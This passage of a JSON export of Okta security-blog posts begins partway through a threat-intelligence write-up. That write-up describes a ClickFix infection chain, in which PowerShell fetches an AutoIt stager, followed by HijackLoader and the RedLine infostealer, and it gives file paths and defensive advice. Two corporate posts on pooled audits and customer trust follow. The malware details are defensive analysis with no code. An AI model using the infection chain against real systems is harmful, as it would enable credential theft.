additional malware stages. The PowerShell script downloads a .zip file containing a malicious AutoIt-compiled script, launch_traffic4.a3x, and a legitimate copy of the AutoIT3 execution binary, Autoit3.exe. The malicious script is executed and acts as the initial stager, initiating a complex execution chain.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The infection proceeds as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Initial Launcher\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The executed script spawns a binary Swi_Compiler.exe from the %TEMP% directory.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Persistence:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Swi_Compiler.exe then copies itself to C:\\\\ProgramData\\\\fastpatch\\\\ and executes from there, establishing persistence by creating files in both %APPDATA%\\\\fastpatch\\\\ and %PROGRAMDATA%\\\\fastpatch\\\\ directories.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Loader\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (HijackLoader): Swi_Compiler.exe has been identified as HijackLoader, a loader known to employ various evasion techniques. 
Its configuration includes injecting %windir%\\\\SysWOW64\\\\pla.dll into processes.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Information Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (RedLine Stealer): HijackLoader proceeds to drop and execute OmegaDynami.exe and XPFix.exe. OmegaDynami.exe is identified as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"RedLine Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", a prominent information stealer available on underground forums. RedLine Stealer focuses on harvesting sensitive browser information, including saved credentials, autocomplete data, and credit card information from Chrome, Edge, and Firefox. It also collects system inventory data (username, location, hardware, security software details) and attempts to steal cryptocurrency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Process Injection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": OmegaDynami.exe (RedLine Stealer) exhibits sophisticated process injection capabilities, creating threads and injecting Portable Executable (PE) files into multiple Chrome browser processes. 
It also performs memory mapping operations on Chrome processes with read-write permissions and modifies thread contexts.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to prevent ClickFix campaigns\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks rely on the assumption that many users don’t understand the risks of executing commands delivered from an untrusted party. They just want to comply with the verification request and get on with visiting what they thought was going to be a legitimate website. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Windows administrators can and should consider allowing only the execution of trusted, digitally-signed PowerShell scripts on managed devices and denying all others. MacOS administrators should ensure features such as Gatekeeper and System Integrity Protection (SIP) are enabled to protect critical files and processes. Additionally, preexec hooks can be configured within command and scripting interpreters to display a warning confirmation before any interactive command is executed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standard perimeter detection controls (email and web filtering) can prevent users on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" devices from accessing \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"known\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" malicious sites. Relying on these defences assumes the malicious site is live for long enough for reputation services to catch on. 
Unfortunately, they do little to protect users on unmanaged devices, which are more often than not the devices infected with infostealers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For this reason, we recommend restricting access to sensitive applications to devices that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Endpoint Management tools and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"protected by endpoint security tools\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". That way, you can be assured that the session tokens for highly sensitive apps are less likely to get scooped up by this commodity malware. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has published a \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"detailed adversarial breakdown\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of this ClickFix campaign, including Indicators of Compromise (IoCs) exclusively for security contacts of Okta customers at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"ClickFix campaigns exploit user trust and problem-solving instincts to bypass conventional security measures."},"updatedAt":"2025-07-09T13:49:44.963Z","secAuthor":[{"id":"e9cc3726-fe50-559a-9a1a-adada488dd9e","bio":{"bio":"<p> Tom Simpson is a Staff Detection and Response Engineer within Okta’s Defensive Cyber Operations team. Tom has spent a decade in the security industry and is an expert at intrusion research, incident response and engineering of secure systems, which he’s demonstrated at Okta, TikTok USDS, CrowdStrike, and in the Australian Defence industry. Tom currently holds the GSEC, GCIH and GREM, having previously volunteered as a SANS teaching assistant. 
Tom enjoys researching the latest trends in Adversary tactics and sharing his findings through security research blogs and conference talks.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg"},"name":"Tom Simpson","jobTitle":"Detection and Response Engineer","slug":"/hackers/tom-simpson","node_locale":"en"},{"id":"22dea194-5ef2-5cfb-8c46-f89bf610a204","bio":{"bio":"<p> Daniel López is a Cyber Threat Researcher at Okta, where he focuses on tracking threat actor activity and the evolving threat landscape to best protect Okta’s employees and customers. Prior to joining Okta, Daniel worked at international companies across the consulting, financial services, and technology sectors. He enjoys participating in trusted infosec groups, continuously learning (both tech and non-tech topics), and staying physically active.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png"},"name":"Daniel López","jobTitle":"Cyber Threat Researcher","slug":"/hackers/daniel-lopez","node_locale":"en"}]},{"slug":"/articles/2025/06/paving-the-path-pooled-audits-with-okta-security","id":"1ae87eb9-d8d2-59bf-aeb3-5f8ba5940d7f","title":"Paving the Path: Pooled Audits with Okta Security","date":"2025-06-25T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance. 
This new, collaborative model builds on the foundation we've detailed in our previous \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/hackers//hacker/tushar-badlani\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"posts\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of the Customer Trust series, which cover our team's mission, mandate, and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Expanding our Program\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Routine, individual audits have remained crucial for building customer confidence and fostering strong relationships. In order to address the inherent time and resource demands of the traditional one-on-one model, we've introduced an innovative pooled audit program designed to work alongside it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our Customer Audit program directly reflects the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Love our Customers \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"core value and is a testament to our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"long-term commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to lead the industry in the fight against identity-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To support our global customers, we’ve launched region-specific regulatory support, starting with the 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resilience Act (DORA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in the European Union and United Kingdom and, more recently, the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.apra.gov.au/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Australian Prudential Regulation Authority (APRA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in Australia. As regulatory expectations around cloud service providers continue to evolve, these collaborative audit sessions are helping us proactively meet customer needs while setting a new standard for partnership and trust at scale.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Program Benefits\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is leading the charge in elevating confidence and clarity across the evolving regulatory landscape. Our program establishes a new industry benchmark, paving a fundamental shift in the collaborative dynamics between critical technology vendors and customers. We bring multiple industry-specific customers into Okta offices for multi-day, hands-on sessions to collectively assess our controls against specific cybersecurity regulations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In our most recent pooled audit, we thoroughly covered Australian Prudential Regulation Authority (APRA) expectations with our Financial Services Industry (FSI) customers in the region. 
The nine key domains that were covered included:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"BCP and Operational Resilience,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Datacenter Security,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Third Party Risk Management,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enterprise Risk Management,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Physical Security and Identity Access,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Control and Configuration,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cryptography,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability Management, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident Management. 
\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The result wasn't just a compliance checkmark — based on the feedback captured, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"90%\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" of participating customers left with significantly higher confidence in their ability to demonstrate their organization’s compliance to the APRA regulation. Since launch, we’ve realized the following program benefits:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fostering Trust \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This one-to-many model eradicates the heavy resource strain of one-to-one, repetitive audits. Our customers are at the heart of everything we do. It is important to highlight how Okta builds trust by demonstrating our robust security. As Okta continues to grow and is now considered a critical outsource provider, this pooled audit model is helping more customers meet regulatory obligations. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deeper collaboration and shared insights\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our program introduces a change from the standard private audit model by introducing opportunities to engage with industry peers and share learnings. 
Okta’s in-person audit setting helps support the fostering of new connections and strengthening existing relationships, enabling a forum to share best practices and gain invaluable insights from both Okta and pooled audit participants.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Proactivity versus reactivity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While these new regulations don't directly impact Okta, we take a proactive approach by engaging our customers directly when new regulations emerge. By helping them understand how Okta's security controls apply and effectively address new requirements, we can support them in their compliance adherence efforts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Measuring What Matters\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Measuring the success of pooled audit programs not only gives our security team and leadership insight into what is driving concerns for customers, but also how we can improve future sessions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Most recently,\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" 90%\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" of APRA pooled audit participants reported high program effectiveness, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"94% \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"reported increased confidence in Okta as a security partner. Our program’s mandate is to build lasting trust and strengthen partnerships. 
Here’s what our customers are saying about us:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“I like the concept of the pooled audit. It was good to have the Okta team outline the control environment to help us to complete our obligation requirements. It was good to connect with other customers that are in similar positions.” - Senior Manager at a global financial services company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The information sharing was open and questions were answered well and comprehensively.” - Technology Risk Manager at a globally recognized financial services company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Okta/Auth0 is a key service provider for our business services. It was good to understand the security controls and evidence shown in the pooled audit which demonstrates the security posture and maturity across Okta/Auth0.” - Head of Security Strategy and Architecture at a global retail payment company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The openness of Okta in sharing information has supported our compliance journey. The session allowed us to get better insights and comfort around how a key partner is ensuring the security and continuity of services to its customers. 
Opening discussion and being able to gain clarification directly from senior leaders.” - Senior Operational Risk Manager at a global retail payment company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The face-to-face engagement was excellent, and Okta's collaborative approach was a significant benefit. We feel it's truly important to foster this trusted relationship and to continue growing more secure together\\\" – EU Customer \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our Future Vision\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’re focused on continuing to expand our Customer Audit program across new industries and regions, opening the program benefits to additional customers outside of Financial Services. We believe a world-leading SaaS identity service can support their success. We’re committed to supporting our customers through the evolving and complex regulatory landscape they face.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This journey toward scalable assurance is bigger than Okta. We’re calling on our peers in the security SaaS community to join in on these efforts. Are you exploring pooled audits or similar collaborative models? Reach out at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:customertrust@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"customeraudit@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to collaborate on audit-based insights and accelerate the industry's progress for all customers. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By openly sharing our collective expertise and challenges, we can create a more trusted, secure ecosystem for everyone. We welcome your feedback and partnership as we build this new standard, together.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance."},"updatedAt":"2025-06-25T17:38:20.427Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"<p> Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"},{"id":"fa04ab47-82af-5c37-83c0-2a2a861a79f8","bio":{"bio":"<p>Lydia Le is an Associate Analyst at Okta, providing Assurance support to the Security Customer Trust team. 
Her commitment to continuous learning and keen attention to detail supports Okta’s mission by securing digital Identities and strengthening customer trust. Outside of work, Lydia enjoys reading, traveling, and exploring new cuisines - always eager to broaden her horizons and learn differing perspectives. </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg"},"name":"Lydia Le","jobTitle":"Associate Analyst","slug":"/hackers/lydia-le","node_locale":"en"}]},{"slug":"/articles/2024/09/unveiling-essence-security-customer-trust","id":"86717a36-4a66-58a7-b3c8-afe62ce12bc7","title":"Unveiling the Essence of the Security Customer Trust Function","date":"2024-09-17T12:14","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After nearly a decade of security experience, I’ve seen firsthand how crucial focusing on customer trust is to organizational success. Over the last four years at Okta, I’ve gained insights into the dynamic between trust, security and customer satisfaction. In this blog, I’ll share my reflections on the vital role of Okta’s Security Customer Trust team, highlighting the key principles and practices imperative to building trust.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introducing Okta’s Trust Center\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There was a time when only a handful of enterprise SaaS vendors possessed SOC 2 or ISO 27001 certifications. However, in today’s market, vendors are scrutinized based on the data they handle, regardless of their size. 
Small B2B SaaS companies must now provide compliance certifications, penetration testing results, and answers to extensive security questionnaires to finalize deals, and larger SaaS vendors can find themselves responding to dozens (or even hundreds) of security questionnaires.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust plays a pivotal role in getting new prospects interested and retaining current customers. Earning and maintaining customer trust isn't just a goal; it's a commitment guiding every decision. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we've taken a proactive approach to this challenge by launching a new consolidated Trust Center. This centralized, seamless, and secure repository allows customers and partners to self-service access key compliance documents to validate our security posture and stay informed on our latest updates. 
Explore our new Trust Center and learn more about our transparency and security practices at\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Customer Trust Team at Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta's ecosystem, the Security Customer Trust team is essential for maintaining platform security and continued integrity. This team proactively communicates Okta's security strategy, responds to customer inquiries, and builds trust through consistent outreach. By working closely with internal security teams, product, sales, privacy, and customer support, we ensure security is integrated across all aspects of Okta’s operations. This dedication to transparency, accountability, and customer-centricity helps Okta earn and maintain the trust of its global customer base.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust is more than just a buzzword; it’s a core principle woven into every facet of our organization. As a provider of identity management solutions, Okta understands that trust and identity are foundational to customer relationships. With the ever-growing complexity of identity attacks, protecting against these threats is critical. 
Okta remains committed to prioritizing features that safeguard users under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", ensuring ongoing protection as technology evolves.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Security Customer Trust team operates with a clear mission: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"to bolster security outcomes for Okta customers and the communities we serve\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". The team is dedicated to advocating best practices and championing zero trust principles when leveraging Okta. Actively seeking feedback from customers and prospects, the team continually helps to enhance Okta's products and services, ensuring they remain at the forefront of security innovation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust is the glue that binds Okta’s external relationships with customers, partners, vendors, and communities. Okta's vision, “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"to free everyone to safely use any technology”,\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" underscores its commitment to providing a secure and reliable digital identity service. 
Rooted in the principle of \\\"love our customers,\\\" the team is dedicated to ensuring Okta’s services remain both available and secure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The evolution of the CISO role highlights the growing importance of security in business strategy. Modern CISO’s are not only security practitioners, but also the strategic leaders responsible for integrating security across business operations, managing risks, and fostering a collective cybersecurity culture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementing and Maintaining Trust\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building customer trust is integral, especially given Identity Providers (IdP) like Okta face constant threats from well-funded adversaries. Cyber threats are persistent, highlighting the need for strong security measures. As Johan Thorbecke said, \\\"Trust arrives on foot and leaves on horseback.\\\" Trust can be fragile, so it's imperative to maintain through continuous and comprehensive security efforts to maintain confidence in cloud services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security-First Approach\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta places 